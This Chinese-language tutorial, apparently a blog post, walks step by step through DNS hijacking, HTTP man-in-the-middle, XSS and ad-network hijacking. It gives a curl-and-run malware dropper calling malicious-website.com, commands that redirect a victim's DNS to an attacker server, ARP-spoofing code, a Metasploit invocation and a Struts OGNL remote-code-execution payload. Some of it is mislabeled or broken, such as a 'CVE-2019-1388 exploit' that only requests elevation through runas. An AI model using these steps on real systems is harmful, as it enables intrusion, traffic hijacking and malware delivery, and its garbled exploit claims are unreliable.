仅供学习研究交流使用，切勿用于违法犯罪，为维护网络安全做贡献！

一、DNS劫持

1. 修改本地DNS设置

步骤一：物理访问或恶意软件感染

恶意软件感染：

• 攻击者通过钓鱼邮件或恶意网站诱导用户下载并运行恶意软件。

python

复制代码

# 示例Python代码，恶意软件伪装成合法软件 import os def download_payload(): # 下载恶意软件 os.system("curl -O http://malicious-website.com/malware.exe") def execute_payload(): # 执行下载的恶意软件 os.system("malware.exe") download_payload() execute_payload()

步骤二：获取管理员权限

提权方法：

• 恶意软件利用系统漏洞提升权限，例如通过Windows UAC绕过或使用已知的提权漏洞。

示例漏洞：CVE-2019-1388

• CVE-2019-1388是一个Windows UAC绕过漏洞，攻击者可以通过伪造的签名窗口提升权限。

利用示例：

1. 创建恶意文件：

c

复制代码

// Exploit.c: 利用CVE-2019-1388的UAC绕过漏洞 #include <windows.h> #include <stdio.h> int main() { SHELLEXECUTEINFO shExecInfo; shExecInfo.cbSize = sizeof(SHELLEXECUTEINFO); shExecInfo.fMask = SEE_MASK_NOCLOSEPROCESS; shExecInfo.hwnd = NULL; shExecInfo.lpVerb = "runas"; // 请求管理员权限 shExecInfo.lpFile = "cmd.exe"; // 要运行的程序 shExecInfo.lpParameters = "/c net user hacker Password123! /add"; // 创建新用户 shExecInfo.lpDirectory = NULL; shExecInfo.nShow = SW_SHOWNORMAL; shExecInfo.hInstApp = NULL; ShellExecuteEx(&shExecInfo); WaitForSingleObject(shExecInfo.hProcess, INFINITE); CloseHandle(shExecInfo.hProcess); return 0; }

1. 编译并运行恶意文件：

shell

复制代码

gcc Exploit.c -o Exploit.exe Exploit.exe

步骤三：修改DNS设置

使用命令提示符：

shell

复制代码

# 修改DNS设置，将DNS服务器地址更改为攻击者控制的DNS服务器 netsh interface ip set dns name="Local Area Connection" static 203.0.113.5

修改注册表：

shell

复制代码

# 示例命令，修改注册表中的DNS设置 reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{interface-ID}" /v NameServer /t REG_SZ /d 203.0.113.5 /f

步骤四：DNS解析劫持

• 当用户访问合法域名时，DNS请求被发送到攻击者控制的DNS服务器，返回伪造的IP地址，重定向用户到恶意网站。

2. 攻击DNS服务器

步骤一：识别目标DNS服务器

• 使用工具如nslookup、whois或dig来识别DNS服务器的IP地址和相关信息。

shell

复制代码

# 使用nslookup识别DNS服务器 nslookup example.com

步骤二：漏洞利用或暴力破解

• 利用DNS服务器软件的已知漏洞，例如BIND DNS服务器中的漏洞CVE-2020-8617，或通过暴力破解获取管理员权限。

shell

复制代码

# 使用Metasploit框架利用BIND DNS漏洞 use exploit/linux/misc/bind_tkey set RHOSTS <target_ip> set LHOST <your_ip> exploit

步骤三：篡改DNS解析记录

• 登录DNS服务器的管理界面，修改DNS解析记录，将合法域名解析为恶意IP地址。

shell

复制代码

# 例如，在BIND DNS服务器中修改zone文件 vi /etc/bind/named.conf.local # 添加或修改解析记录 zone "example.com" { type master; file "/etc/bind/db.example.com"; };

步骤四：劫持用户请求

• 所有请求该DNS服务器解析域名的用户都会被重定向到恶意网站。

二、HTTP劫持

中间人攻击（MITM）

步骤一：建立中间人位置

ARP欺骗：

python

复制代码

# 使用scapy库进行ARP欺骗 from scapy.all import ARP, send def arp_poison(target_ip, target_mac, spoof_ip): arp_response = ARP(pdst=target_ip, hwdst=target_mac, psrc=spoof_ip, op='is-at') send(arp_response, verbose=0) # 示例：将目标IP的网关MAC地址更改为攻击者的MAC地址 arp_poison('192.168.1.10', '00:11:22:33:44:55', '192.168.1.1')

步骤二：拦截HTTP请求

捕获HTTP流量：

shell

复制代码

# 使用Wireshark或tcpdump捕获HTTP流量 tcpdump -i eth0 -w capture.pcap 'tcp port 80'

步骤三：篡改HTTP响应

使用Burp Suite拦截并修改HTTP响应：

• 在Burp Suite中设置拦截规则，拦截HTTP响应并插入恶意代码。

html

复制代码

<!-- 插入恶意JavaScript代码的示例 --> <script>alert('This site is hacked');</script>

步骤四：执行恶意代码

• 用户浏览器接收并执行篡改后的HTTP响应，执行其中的恶意代码。

三、内容注入

XSS（跨站脚本）攻击

步骤一：发现注入点

• 攻击者在论坛、评论区或其他用户输入区域进行测试，寻找可以插入JavaScript代码的注入点。

步骤二：构造恶意代码

html

复制代码

<!-- 示例：构造包含恶意JavaScript代码的输入 --> <script>alert('XSS');</script>

步骤三：注入恶意代码

• 攻击者将恶意代码输入到注入点，提交表单或发布评论。

步骤四：执行恶意代码

• 服务器未对输入进行适当过滤，直接返回包含恶意代码的响应。用户浏览器执行恶意代码，攻击者实现控制。

四、广告劫持

劫持第三方广告网络

步骤一：识别目标广告网络

• 攻击者通过分析广告脚本和网络流量，确定广告网络的来源和结构。

javascript

复制代码

// 分析广告脚本 console.log(document.querySelectorAll('script[src*="adnetwork.com"]'));

步骤二：漏洞利用或社会工程学

• 利用广告网络的漏洞或通过社会工程学手段获取广告网络管理权限。

示例漏洞：CVE-2018-11776

• 这是一个Apache Struts的远程代码执行漏洞，攻击者可以通过特定的输入导致远程代码执行。

利用示例：

1. 创建恶意请求：

http

复制代码

POST /struts2-rest-showcase/orders HTTP/1.1 Host: target.com Content-Type: application/x-www-form-urlencoded Content-Length: 100 %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess=#dm).(#cmd='id').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/sh','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

1. 发送恶意请求：

• 使用工具如curl或Burp Suite发送恶意请求，触发漏洞。

步骤三：替换广告内容

• 攻击者登录广告网络管理界面，将合法广告替换为恶意广告，内容包括恶意JavaScript代码或重定向链接。

html

复制代码

<!-- 替换广告内容为恶意广告 --> <script src="http://malicious-website.com/malicious.js"></script>

步骤四：加载恶意广告

• 用户浏览包含被劫持广告的网页时，恶意广告加载并执行，其中的恶意代码或重定向链接开始运行。

html

复制代码

<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>Ad Page</title> </head> <body> <h1>Welcome to the Ad Page</h1> <!-- 恶意广告加载 --> <script src="http://malicious-website.com/malicious.js"></script> </body> </html>

结论

通过详细的步骤和代码示例，我们可以更清楚地了解DNS劫持、HTTP劫持、内容注入和广告劫持的实现方式。这些攻击手段对用户和网络安全构成严重威胁，但通过了解其原理和实现细节，我们可以采取更有效的防护措施，保护我们的网络环境和数据安全。如果你有任何问题或想法，请在评论区分享，我们一起探讨。